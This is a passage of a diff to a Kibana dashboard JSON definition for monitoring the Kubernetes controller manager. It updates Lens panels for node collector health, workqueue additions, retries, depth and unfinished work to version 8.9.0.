"filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.node.collector.unhealthy.count: *" - }, - "isBucketed": false, - "label": "Part of Unhealthy nodes", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.node.collector.count" - }, - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Unhealthy nodes", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X0", - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X1" - ], - "name": "divide", - "type": "function" - }, - 100 - ], - "location": { - "max": 277, - "min": 0 - }, - "name": "multiply", - "text": "last_value(kubernetes.controllermanager.node.collector.unhealthy.count, kql='kubernetes.controllermanager.node.collector.unhealthy.count: *')/last_value(kubernetes.controllermanager.node.collector.count, kql='kubernetes.controllermanager.node.collector.unhealthy.count: *')*100", - "type": "function" - } - }, - "references": [ - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X0", - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X1" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Workqueue additions increase rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "1cd3ebab-9630-4253-b9a6-5f921e5cb617", + "w": 24, + "x": 24, + "y": 13 + }, + "panelIndex": "1cd3ebab-9630-4253-b9a6-5f921e5cb617", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-77b347b2-91fa-470f-861d-ada0e175cbc4", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b460c8d2-ab24-41ed-aac8-998febec263b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "77b347b2-91fa-470f-861d-ada0e175cbc4": { + "columnOrder": [ + "68f1dece-b63b-4a27-9c1f-8068f2f9bedb", + "34f7328b-5fef-43e7-9350-98256b031a79", + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71", + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1", + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0" + ], + "columns": { + "34f7328b-5fef-43e7-9350-98256b031a79": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "68f1dece-b63b-4a27-9c1f-8068f2f9bedb": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of kubernetes.controllermanager.name + 1 other", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Maximum of kubernetes.controllermanager.workqueue.retries.count", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.workqueue.retries.count" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "columns": [ - { - "alignment": "center", - "columnId": "310bfe34-31c8-4c52-bff0-60450318be7e", - "isTransposed": false - }, - { - "alignment": "center", - "columnId": "28f81466-455c-469d-8c35-b53555ae5e8a", - "isTransposed": false - }, - { - "alignment": "center", - "columnId": "363b1795-4ab4-43e8-87a6-fafe691bddf2", - "isTransposed": false - }, - { - "alignment": "center", - "columnId": "c3ae8ff0-53ae-4da5-9521-b9467df47ed3", - "isTransposed": false - }, - { - "columnId": "6b1f578b-3e83-443b-a2da-b97ecbcd67bb", - "isTransposed": false - } - ], - "layerId": "239b73ac-0fc9-44fd-a7c5-2d0281e6b765", - "layerType": "data" - } + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "host.name" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.controllermanager.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 7, - "i": "aef813b5-85d5-46c9-a86a-2e273806d488", - "w": 25, - "x": 23, - "y": 3 - }, - "panelIndex": "aef813b5-85d5-46c9-a86a-2e273806d488", - "title": "Node collector", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Rate", + "operationType": "formula", + "params": { + "formula": "counter_rate(last_value(kubernetes.controllermanager.workqueue.retries.count))", + "isFormulaBroken": false + }, + "references": [ + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1" + ], + "scale": "ratio", + "timeScale": "s" }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(205,245,246,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_0599e0ae-2375-4ceb-b12d-2ebec4310cc6_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "Workqueue", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.workqueue.retries.count: *" + }, + "isBucketed": false, + "label": "Part of Rate", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.workqueue.retries.count" }, - "title": "", - "type": "metrics", - "uiState": {} + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Rate", + "operationType": "counter_rate", + "references": [ + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0" + ], + "scale": "ratio", + "timeScale": "s" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "b460c8d2-ab24-41ed-aac8-998febec263b", + "key": "kubernetes.controllermanager.workqueue.retries.count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.controllermanager.workqueue.retries.count" } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 3, - "i": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6", - "w": 48, - "x": 0, - "y": 10 + "layers": [ + { + "accessors": [ + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71" + ], + "layerId": "77b347b2-91fa-470f-861d-ada0e175cbc4", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "68f1dece-b63b-4a27-9c1f-8068f2f9bedb", + "xAccessor": "34f7328b-5fef-43e7-9350-98256b031a79" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": true }, - "panelIndex": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6", - "title": "", - "type": "visualization", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Workqueue retries increase rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "3a26dffa-0696-485d-b991-1dbc5092082e", + "w": 24, + "x": 0, + "y": 27 + }, + "panelIndex": "3a26dffa-0696-485d-b991-1dbc5092082e", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-2b80230c-9cc8-444f-b092-1fbc4d764992", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7e0ad24d-199f-4ede-8b71-90152913fa90", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2b80230c-9cc8-444f-b092-1fbc4d764992": { + "columnOrder": [ + "e7259e4c-0700-48a5-aeff-993fc075bcab", + "7b8d9b03-439b-4171-8b64-91b8664b4b94", + "725088f8-ac91-4df6-8863-f9abe7ad40cd", + "725088f8-ac91-4df6-8863-f9abe7ad40cdX0", + "725088f8-ac91-4df6-8863-f9abe7ad40cdX1" + ], + "columns": { + "725088f8-ac91-4df6-8863-f9abe7ad40cd": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Depth", + "operationType": "formula", + "params": { + "formula": "differences(average(kubernetes.controllermanager.workqueue.depth.count, kql='kubernetes.controllermanager.workqueue.depth.count: *'))", + "isFormulaBroken": false + }, + "references": [ + "725088f8-ac91-4df6-8863-f9abe7ad40cdX1" + ], + "scale": "ratio", + "timeScale": "s" + }, + "725088f8-ac91-4df6-8863-f9abe7ad40cdX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.workqueue.depth.count: *" + }, + "isBucketed": false, + "label": "Part of Depth", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.workqueue.depth.count" + }, + "725088f8-ac91-4df6-8863-f9abe7ad40cdX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Depth", + "operationType": "differences", + "references": [ + "725088f8-ac91-4df6-8863-f9abe7ad40cdX0" + ], + "scale": "ratio" + }, + "7b8d9b03-439b-4171-8b64-91b8664b4b94": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "e7259e4c-0700-48a5-aeff-993fc075bcab": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Depth", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of kubernetes.controllermanager.workqueue.depth.count", + "operationType": "sum", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.workqueue.depth.count" }, - { - "id": "metrics-*", - "name": "3ed2b7d8-6b77-43b7-8ed3-c52117016d59", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "76c85206-02c1-4f35-bb0d-c1d4d3ee59d7": { - "columnOrder": [ - "f2d3349e-531e-453c-bac7-fc4c1a47ea86", - "4266ba8e-3786-4162-9140-15f600580db0", - "5b2495ee-2297-4e20-81d3-ac385205cb01", - "5b2495ee-2297-4e20-81d3-ac385205cb01X1", - "5b2495ee-2297-4e20-81d3-ac385205cb01X0" - ], - "columns": { - "4266ba8e-3786-4162-9140-15f600580db0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "5b2495ee-2297-4e20-81d3-ac385205cb01": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Counter rate", - "operationType": "formula", - "params": { - "formula": "counter_rate(last_value(kubernetes.controllermanager.workqueue.adds.count))", - "isFormulaBroken": false - }, - "references": [ - "5b2495ee-2297-4e20-81d3-ac385205cb01X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "5b2495ee-2297-4e20-81d3-ac385205cb01X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.workqueue.adds.count: *" - }, - "isBucketed": false, - "label": "Part of Counter rate", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.workqueue.adds.count" - }, - "5b2495ee-2297-4e20-81d3-ac385205cb01X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Counter rate", - "operationType": "counter_rate", - "references": [ - "5b2495ee-2297-4e20-81d3-ac385205cb01X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "f2d3349e-531e-453c-bac7-fc4c1a47ea86": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Workqueues", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": false, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.controllermanager.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderBy": { + "type": "custom" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "multi_terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "layers": [ - { - "accessors": [ - "5b2495ee-2297-4e20-81d3-ac385205cb01" - ], - "layerId": "76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "f2d3349e-531e-453c-bac7-fc4c1a47ea86", - "xAccessor": "4266ba8e-3786-4162-9140-15f600580db0" - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "secondaryFields": [ + "host.name" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.controllermanager.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "7e0ad24d-199f-4ede-8b71-90152913fa90", + "key": "kubernetes.controllermanager.workqueue.depth.count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.controllermanager.workqueue.depth.count" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "layers": [ + { + "accessors": [ + "725088f8-ac91-4df6-8863-f9abe7ad40cd" + ], + "collapseFn": "", + "layerId": "2b80230c-9cc8-444f-b092-1fbc4d764992", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "e7259e4c-0700-48a5-aeff-993fc075bcab", + "xAccessor": "7b8d9b03-439b-4171-8b64-91b8664b4b94" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true }, - "gridData": { - "h": 14, - "i": "2ba53067-d43d-42eb-ac50-2d941977ce95", - "w": 24, - "x": 0, - "y": 13 + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": false, + "xTitle": "", + "yLeftExtent": { + "mode": "full" }, - "panelIndex": "2ba53067-d43d-42eb-ac50-2d941977ce95", - "title": "Workqueue additions increase rate", - "type": "lens", - "version": "8.6.0" + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-77b347b2-91fa-470f-861d-ada0e175cbc4", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Workqueue depth rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "6a8b9a40-11ec-4790-a38d-2d88c5468f12", + "w": 24, + "x": 24, + "y": 27 + }, + "panelIndex": "6a8b9a40-11ec-4790-a38d-2d88c5468f12", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-a2facaed-7c02-4fb6-9126-5512b8ffd26f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1c580aea-6c0f-4de6-9c30-f6b9a6964b0d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a2facaed-7c02-4fb6-9126-5512b8ffd26f": { + "columnOrder": [ + "73933c6b-b6da-45c6-a190-c501453f658f", + "3ed7787d-1fbe-487f-a377-9a5e5e6f2571", + "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778" + ], + "columns": { + "3ed7787d-1fbe-487f-a377-9a5e5e6f2571": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "73933c6b-b6da-45c6-a190-c501453f658f": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of kubernetes.controllermanager.name + 1 other", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Maximum of kubernetes.controllermanager.workqueue.unfinished.sec", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.workqueue.unfinished.sec" }, - { - "id": "metrics-*", - "name": "b460c8d2-ab24-41ed-aac8-998febec263b", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "77b347b2-91fa-470f-861d-ada0e175cbc4": { - "columnOrder": [ - "68f1dece-b63b-4a27-9c1f-8068f2f9bedb", - "34f7328b-5fef-43e7-9350-98256b031a79", - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71", - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1", - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0" - ], - "columns": { - "34f7328b-5fef-43e7-9350-98256b031a79": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "68f1dece-b63b-4a27-9c1f-8068f2f9bedb": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of kubernetes.controllermanager.name + 1 other", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Maximum of kubernetes.controllermanager.workqueue.retries.count", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.workqueue.retries.count" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "host.name" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.controllermanager.name" - }, - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Rate", - "operationType": "formula", - "params": { - "formula": "counter_rate(last_value(kubernetes.controllermanager.workqueue.retries.count))", - "isFormulaBroken": false - }, - "references": [ - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.workqueue.retries.count: *" - }, - "isBucketed": false, - "label": "Part of Rate", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.workqueue.retries.count" - }, - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Rate", - "operationType": "counter_rate", - "references": [ - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0" - ], - "scale": "ratio", - "timeScale": "s" - } - }, - "incompleteColumns": {} - } - } - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "b460c8d2-ab24-41ed-aac8-998febec263b", - "key": "kubernetes.controllermanager.workqueue.retries.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.controllermanager.workqueue.retries.count" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "multi_terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71" - ], - "layerId": "77b347b2-91fa-470f-861d-ada0e175cbc4", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "68f1dece-b63b-4a27-9c1f-8068f2f9bedb", - "xAccessor": "34f7328b-5fef-43e7-9350-98256b031a79" - } - ], - "legend": { - "isVisible": true, - "position": "right", - "shouldTruncate": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "secondaryFields": [ + "host.name" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.controllermanager.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778": { + "dataType": "number", + "isBucketed": false, + "label": "Last value of kubernetes.controllermanager.workqueue.unfinished.sec", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "s" + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.workqueue.unfinished.sec" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "1c580aea-6c0f-4de6-9c30-f6b9a6964b0d", + "key": "kubernetes.controllermanager.workqueue.unfinished.sec", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.controllermanager.workqueue.unfinished.sec" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778" + ], + "layerId": "a2facaed-7c02-4fb6-9126-5512b8ffd26f", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "73933c6b-b6da-45c6-a190-c501453f658f", + "xAccessor": "3ed7787d-1fbe-487f-a377-9a5e5e6f2571" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": true }, - "gridData": { - "h": 14, - "i": "1cd3ebab-9630-4253-b9a6-5f921e5cb617", - "w": 24, - "x": 24, - "y": 13 + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "1cd3ebab-9630-4253-b9a6-5f921e5cb617", - "title": "Workqueue retries increase rate", - "type": "lens", - "version": "8.6.0" + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Current unfinished work" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "c3fee68f-01c6-49da-a759-2900b1cd15bf", + "w": 48, + "x": 0, + "y": 41 + }, + "panelIndex": "c3fee68f-01c6-49da-a759-2900b1cd15bf", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-2b80230c-9cc8-444f-b092-1fbc4d764992", - "type": "index-pattern" + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(239,249,218,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "Process", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ + { + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" + }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "75255ce8-2d49-4b4f-ac0e-a20fe8f4daec", + "w": 24, + "x": 0, + "y": 44 + }, + "panelIndex": "75255ce8-2d49-4b4f-ac0e-a20fe8f4daec", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "daf730fb-a3b5-400a-acba-cff0c8ba607d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807": { + "columnOrder": [ + "6cbab896-ee42-4dad-8831-12f53cda0d6d", + "910bd079-4852-48bd-9d7a-e5eb940f0838", + "ee812faf-6f3c-4cc2-ad9a-27136340ef39", + "96c80749-da61-425a-b637-878d33e410fd", + "96c80749-da61-425a-b637-878d33e410fdX0", + "96c80749-da61-425a-b637-878d33e410fdX2", + "96c80749-da61-425a-b637-878d33e410fdX1", + "910bd079-4852-48bd-9d7a-e5eb940f0838X0", + "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0" + ], + "columns": { + "6cbab896-ee42-4dad-8831-12f53cda0d6d": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host", + "operationType": "terms", + "params": { + "missingBucket": false, + 